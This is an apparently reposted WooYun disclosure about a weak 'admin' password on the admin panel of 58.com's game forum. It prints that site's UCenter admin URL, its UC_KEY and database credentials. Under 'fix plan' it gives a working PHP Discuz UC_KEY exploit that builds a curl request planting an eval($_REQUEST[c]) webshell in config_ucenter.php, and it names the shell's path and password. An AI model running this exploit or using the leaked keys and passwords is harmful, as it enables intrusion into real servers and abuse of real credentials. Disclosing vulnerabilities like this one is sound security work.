58 游戏论坛后台弱口令可导致getshell

2017年5月4日18:19:42评论429 views字数 230阅读0分46秒阅读模式

摘要

2016-03-11：细节已通知厂商并且等待厂商处理中
2016-03-11：厂商已经确认，细节仅向厂商公开
2016-03-21：细节向核心白帽子及相关领域专家公开
2016-03-31：细节向普通白帽子公开
2016-04-10：细节向实习白帽子公开
2016-04-25：细节向公众公开

漏洞概要关注数(14) 关注此漏洞

缺陷编号： WooYun-2016-183346

漏洞标题： 58 游戏论坛后台弱口令可导致getshell

漏洞作者：Ｈ.Ｕ.Ｃ－人族

提交时间： 2016-03-11 14:01

公开时间： 2016-04-25 15:10

漏洞类型：后台弱口令

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：弱口令 admin/admin弱口令后台地址泄露

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

http://bbs.wan.58.com/uc_server/admin.php?sid=279dCl4qLSDlnm5ZAMOUv%2BnSGzYhbr8qMKvYDm1Jnmd32OfGlQRFcKs4gBM7doceOVP6edWh7iunAw

密码 admin

漏洞证明：

ucenter：key

Uet5r701maVbU04eIb49t2f2y021T2c2K3q9Tdi5Q16f35M3w1XeC7Z9n6X353A8

code 区域

配置信息
 define('UC_CONNECT', 'mysql');
 
 define('UC_DBHOST', '192.168.17.101');
 
 define('UC_DBUSER', '58_bbs');
 
 define('UC_DBPW', 'youxi$217*ceshi&');
 
 define('UC_DBNAME', 'bbs');
 
 define('UC_DBCHARSET', 'utf8');
 
 define('UC_DBTABLEPRE', '`bbs`.prh_ucenter_');
 
 define('UC_DBCONNECT', '0');
 
 define('UC_KEY', 'Uet5r701maVbU04eIb49t2f2y021T2c2K3q9Tdi5Q16f35M3w1XeC7Z9n6X353A8');
 
 define('UC_API', 'http://bbs.wan.58.com/uc_server');
 
 define('UC_CHARSET', 'utf-8');
 
 define('UC_IP', '');
 
 define('UC_APPID', '1');
 
 define('UC_PPP', '20');

修复方案：

code 区域

Discuz的利用UC_KEY进行getshell
 <?php
 
 
 
 
 
 $key = 'cebbvi5s15BSiMXteaP9TNCIz5K5jAVekw7tcV9TqmYCNT5VOJdu7toOxipTX';#少年 uc_key 写在这里
 
 $url = 'http://localhost/api/uc.php';
 
 $arg = 'action=updateapps&time='.time();#拿webshell：http://localhost/config/config_ucenter.php 密码：c
 
 echo 'curl "'.$url.'?code='.rawurlencode(authcode($arg,'ENCODE',$key)).'" -d "'.addslashes('<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">https://sb/');eval(/$_REQUEST[c]);#</item></root>').'"';
 
 #curl或者用其他工具post提交
 
 
 
 function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
 
  $ckey_length = 4;
 
  $key = md5($key);
 
  $keya = md5(substr($key, 0, 16));
 
  $keyb = md5(substr($key, 16, 16));
 
  $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
 
 
 
  $cryptkey = $keya.md5($keya.$keyc);
 
  $key_length = strlen($cryptkey);
 
 
 
  $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
 
  $string_length = strlen($string);
 
 
 
  $result = '';
 
  $box = range(0, 255);
 
 
 
  $rndkey = array();
 
  for($i = 0; $i <= 255; $i++) {
 
   $rndkey[$i] = ord($cryptkey[$i % $key_length]);
 
  }
 
 
 
  for($j = $i = 0; $i < 256; $i++) {
 
   $j = ($j + $box[$i] + $rndkey[$i]) % 256;
 
   $tmp = $box[$i];
 
   $box[$i] = $box[$j];
 
   $box[$j] = $tmp;
 
  }
 
 
 
  for($a = $j = $i = 0; $i < $string_length; $i++) {
 
   $a = ($a + 1) % 256;
 
   $j = ($j + $box[$a]) % 256;
 
   $tmp = $box[$a];
 
   $box[$a] = $box[$j];
 
   $box[$j] = $tmp;
 
   $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
 
  }
 
 
 
  if($operation == 'DECODE') {
 
   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
 
    return substr($result, 26);
 
   } else {
 
    return '';
 
   }
 
  } else {
 
   return $keyc.str_replace('=', '', base64_encode($result));
 
  }
 
 
 
 }
 
 
 
 ?>

版权声明：转载请注明来源Ｈ.Ｕ.Ｃ－人族@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-03-11 15:10

厂商回复：

已确认，感谢对58安全的关注。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-15 22:51 | 大志哥 ( 路人 | Rank:22 漏洞数:7 | @_@)

0

discuz x3.2可以用你这个EXP不？

1# 回复此人

漏洞概要 关注数(14) 关注此漏洞

缺陷编号： WooYun-2016-183346

漏洞标题： 58 游戏论坛后台弱口令可导致getshell

相关厂商： 58同城

漏洞作者： Ｈ.Ｕ.Ｃ－人 族

提交时间： 2016-03-11 14:01

公开时间： 2016-04-25 15:10

漏洞类型： 后台弱口令

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 弱口令 admin/admin弱口令 后台地址泄露

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ｈ.Ｕ.Ｃ－人 族@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(14) 关注此漏洞

漏洞作者：Ｈ.Ｕ.Ｃ－人族

漏洞类型：后台弱口令

危害等级：高

漏洞状态：厂商已经确认

Tags标签：弱口令 admin/admin弱口令后台地址泄露

版权声明：转载请注明来源Ｈ.Ｕ.Ｃ－人族@乌云

漏洞评价(共0人评价):

登陆后才能进行评分